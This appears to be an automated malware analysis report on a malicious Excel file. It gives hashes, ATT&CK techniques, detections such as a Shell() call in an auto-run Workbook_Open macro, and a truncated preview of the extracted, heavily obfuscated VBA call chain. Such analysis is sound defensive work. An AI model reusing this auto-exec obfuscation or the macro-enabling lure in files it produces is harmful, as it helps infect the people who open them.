Office (OLE) malware analysis — malicious · f2c4e058a29c213c

MALICIOUS

Office (OLE)

107.0 KB Created: 2018-02-12 20:36:17 Authoring application: Microsoft Excel First seen: 2018-09-04

MD5: b0ba1dbb9443f7c66a88792786ef18a9 SHA-1: d9c64b27aad84daf12114d8d0351297c01a2139b SHA-256: f2c4e058a29c213c7283be382a2e0ad97d649d02275f3c53b67a99b262e48dd2

228 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an Excel document containing VBA macros, specifically a Workbook_Open event that triggers execution. The document body displays a fake error message in Turkish, prompting the user to enable macros. The VBA code includes a Shell() call, indicating it attempts to execute an external command or payload. The ClamAV detection name 'Xls.Malware.Valyria-10036513-0' further confirms its malicious nature.

Heuristics 6

ClamAV: Xls.Malware.Valyria-10036513-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23665 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	23665 bytes
SHA-256: `7ecb61dca434110f26ca8e0b4b90fc2925292cf346344a205440a76eddc07fe3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Public Sub woRKBoOK_OpEn(): Call XJEFH: End Sub Sub XJEFH() Call UOREJ End Sub Static Sub UOREJ() Call RSFDM End Sub Static Function RSFDM() As Long Call HMNUA End Function Function HMNUA() As Integer Call EQATD End Function Static Function EQATD() As Boolean Call UKJLR End Function Static Sub UKJLR() Call SOWKU End Sub Static Sub SOWKU() Call PSKJX End Sub Function PSKJX() As Single Call FMSAK End Function Static Function FMSAK() As Double Call CQFZN End Function Static Function CQFZN() As Variant Call SKORB End Function Function SKORB() As Object Call POBQE End Function Static Function POBQE() As Currency Call MSPPH End Function Static Sub MSPPH() Call DMXGV End Sub Static Sub DMXGV() Call AQKFX End Sub Function AQKFX() As Boolean Call QKTWL End Function Static Function QKTWL() As String Call NOGWO End Function Static Function NOGWO() Call KTUVR End Function Sub KTUVR() Call ANCMF End Sub Sub ANCMF() Call YRPLI End Sub Static Sub YRPLI() Call OLYCW End Sub Static Sub OLYCW() Call LPLCY End Sub Function LPLCY() As Currency Call ITZBB End Function Static Function ITZBB() As Integer Call YNHSP End Function Static Function YNHSP() As Date Call VRURS End Function Sub VRURS() Call MLDIG End Sub Sub MLDIG() Call JPQIJ End Sub Static Sub JPQIJ() Call ZJZZW End Sub Static Function ZJZZW() As Byte Call WNMYZ End Function Function WNMYZ() As Long Call TRZXC End Function Static Function TRZXC() As Single Call JLIOQ End Function Static Sub JLIOQ() Call GPVOT End Sub Static Sub GPVOT() Call MCAER End Sub Static Function MCAER() Call LVPYQ End Function Private Function LVPYQ() As Object Call RYIZE End Function Static Function RYIZE() As Object Call XBBBS End Function Static Function XBBBS() As Single Call WTQUR End Function Private Function WTQUR() As Date Call CWJVF End Function Static Function CWJVF() As Date Call IZCXT End Function Static Function IZCXT() As Boolean Call OCVYH End Function Private Function OCVYH() As Currency Call NUKSG End Function Static Sub NUKSG() Call TXDTU End Sub Static Sub TXDTU() Call ZAWVI End Sub Private Function ZAWVI() As Long Call JMNUO End Function Sub JMNUO() Call ZKDEU End Sub Sub ZKDEU() Call QIUOO End Sub Static Sub QIUOO() Call FJTSN End Sub Static Sub FJTSN() Call ULSWN End Sub Static Sub ULSWN() Call JNRZM End Sub Private Function JNRZM() As Variant Call RELVW End Function Private Function RELVW() As Long Call FFLZV End Function Private Function FFLZV() As Byte Call UHKCU End Function Private Function UHKCU() As Date Call JJJGT End Function Private Function JJJGT() As Object Call YKIKS End Function Private Function YKIKS() As Variant Call NMHOR End Function Private Sub NMHOR() Call VDBJB End Sub Private Sub VDBJB() Call KFANA End Sub Private Sub KFANA() Call ZGARA End Sub Private Sub ZGARA() Call OIZUZ End Sub Private Sub OIZUZ() Call DKYYY End Sub Private Sub DKYYY() Call RLXCX End Sub Private Function RLXCX() As Currency Call GNWFW End Function Private Function GNWFW() As Boolean Call OEQBG End Function Private Function OEQBG() As Object Call DGQFF End Function Static Function DGQFF() As Integer Call SHPIE End Function Static Function SHPIE() As String Call HJOMD End Function Static Function HJOMD() As Double Call WLNQC End Function Static Sub WLNQC() Call LMMTB End Sub Static Sub L ... (truncated)

SHA-256: 7ecb61dca434110f26ca8e0b4b90fc2925292cf346344a205440a76eddc07fe3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub woRKBoOK_OpEn(): Call XJEFH: End Sub
Sub XJEFH()
Call UOREJ
End Sub
Static Sub UOREJ()
Call RSFDM
End Sub
Static Function RSFDM() As Long
Call HMNUA
End Function
Function HMNUA() As Integer
Call EQATD
End Function
Static Function EQATD() As Boolean
Call UKJLR
End Function
Static Sub UKJLR()
Call SOWKU
End Sub
Static Sub SOWKU()
Call PSKJX
End Sub
Function PSKJX() As Single
Call FMSAK
End Function
Static Function FMSAK() As Double
Call CQFZN
End Function
Static Function CQFZN() As Variant
Call SKORB
End Function
Function SKORB() As Object
Call POBQE
End Function
Static Function POBQE() As Currency
Call MSPPH
End Function
Static Sub MSPPH()
Call DMXGV
End Sub
Static Sub DMXGV()
Call AQKFX
End Sub
Function AQKFX() As Boolean
Call QKTWL
End Function
Static Function QKTWL() As String
Call NOGWO
End Function
Static Function NOGWO()
Call KTUVR
End Function
Sub KTUVR()
Call ANCMF
End Sub
Sub ANCMF()
Call YRPLI
End Sub
Static Sub YRPLI()
Call OLYCW
End Sub
Static Sub OLYCW()
Call LPLCY
End Sub
Function LPLCY() As Currency
Call ITZBB
End Function
Static Function ITZBB() As Integer
Call YNHSP
End Function
Static Function YNHSP() As Date
Call VRURS
End Function
Sub VRURS()
Call MLDIG
End Sub
Sub MLDIG()
Call JPQIJ
End Sub
Static Sub JPQIJ()
Call ZJZZW
End Sub
Static Function ZJZZW() As Byte
Call WNMYZ
End Function
Function WNMYZ() As Long
Call TRZXC
End Function
Static Function TRZXC() As Single
Call JLIOQ
End Function
Static Sub JLIOQ()
Call GPVOT
End Sub
Static Sub GPVOT()
Call MCAER
End Sub
Static Function MCAER()
Call LVPYQ
End Function
Private Function LVPYQ() As Object
Call RYIZE
End Function
Static Function RYIZE() As Object
Call XBBBS
End Function
Static Function XBBBS() As Single
Call WTQUR
End Function
Private Function WTQUR() As Date
Call CWJVF
End Function
Static Function CWJVF() As Date
Call IZCXT
End Function
Static Function IZCXT() As Boolean
Call OCVYH
End Function
Private Function OCVYH() As Currency
Call NUKSG
End Function
Static Sub NUKSG()
Call TXDTU
End Sub
Static Sub TXDTU()
Call ZAWVI
End Sub
Private Function ZAWVI() As Long
Call JMNUO
End Function
Sub JMNUO()
Call ZKDEU
End Sub
Sub ZKDEU()
Call QIUOO
End Sub
Static Sub QIUOO()
Call FJTSN
End Sub
Static Sub FJTSN()
Call ULSWN
End Sub
Static Sub ULSWN()
Call JNRZM
End Sub
Private Function JNRZM() As Variant
Call RELVW
End Function
Private Function RELVW() As Long
Call FFLZV
End Function
Private Function FFLZV() As Byte
Call UHKCU
End Function
Private Function UHKCU() As Date
Call JJJGT
End Function
Private Function JJJGT() As Object
Call YKIKS
End Function
Private Function YKIKS() As Variant
Call NMHOR
End Function
Private Sub NMHOR()
Call VDBJB
End Sub
Private Sub VDBJB()
Call KFANA
End Sub
Private Sub KFANA()
Call ZGARA
End Sub
Private Sub ZGARA()
Call OIZUZ
End Sub
Private Sub OIZUZ()
Call DKYYY
End Sub
Private Sub DKYYY()
Call RLXCX
End Sub
Private Function RLXCX() As Currency
Call GNWFW
End Function
Private Function GNWFW() As Boolean
Call OEQBG
End Function
Private Function OEQBG() As Object
Call DGQFF
End Function
Static Function DGQFF() As Integer
Call SHPIE
End Function
Static Function SHPIE() As String
Call HJOMD
End Function
Static Function HJOMD() As Double
Call WLNQC
End Function
Static Sub WLNQC()
Call LMMTB
End Sub
Static Sub L
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.